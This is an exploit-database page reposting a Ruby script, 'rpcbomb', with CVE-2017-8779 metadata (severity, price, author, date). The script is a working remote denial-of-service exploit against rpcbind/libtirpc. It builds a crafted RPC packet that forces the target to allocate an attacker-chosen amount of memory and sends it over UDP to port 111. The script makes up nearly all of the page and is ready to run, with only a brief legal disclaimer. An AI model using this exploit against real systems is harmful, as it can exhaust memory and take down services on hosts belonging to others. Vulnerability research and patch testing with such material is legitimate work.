RPCBind / libtirpc Denial Of Service
CVE
Category
Price
Severity
CVE-2017-8779
CWE-400
$4000
High
Author
Risk
Exploitation Type
Date
Nils Sommer
High
Remote
2017-05-09
CPE
cpe:cpe:/a:libtirpc:libtirpc:1.0.3
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017050050 Below is a copy:
RPCBind / libtirpc Denial Of Service #!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.
require 'socket'
def usage
abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end
bomb = """
` + # ,
: @ @ @ @ @ @
@ @ ; . + @ @ @ . @ @
@ @ @ @ @ ` @ @
. ` @ #
; @ @ @ . : @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ ;
@ @ @ @ @ @ @ @ @ @ @ @ @ `
@ @ @ @ @ @ @ @ @ @ @ @ @ @ :
# @ @ @ @ @ @ @ @ @ @ @ @ @ '
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ ,
@ @ @ @ @ @ @ @ @ @ @ @ @
, @ @ @ @ @ @ @ @ @ @ @
` @ @ @ @ @ @ @ @ @
, @ @ @ @ @
r p c b o m b
DoS exploit for *nix rpcbind/libtirpc.
(c) 2017 Guido Vranken.
https://guidovranken.wordpress.com/
"""
puts bomb
if ARGV.length >= 2
begin
host = ARGV[0]
numBytes = Integer(ARGV[1])
port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
rescue
usage
end
pkt = [0].pack('N') # xid
pkt << [0].pack('N') # message type CALL
pkt << [2].pack('N') # RPC version 2
pkt << [100000].pack('N') # Program
pkt << [4].pack('N') # Program version
pkt << [9].pack('N') # Procedure
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Program: 0
pkt << [0].pack('N') # Ver
pkt << [4].pack('N') # Proc
pkt << [4].pack('N') # Argument length
pkt << [numBytes].pack('N') # Payload
s = UDPSocket.new
s.send(pkt, 0, host, port)
sleep 1.5
begin
s.recvfrom_nonblock(9000)
rescue
puts "No response from server received."
exit()
end
puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
"\nDamn it feels good to be a gangster.\n\n"
else
usage
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum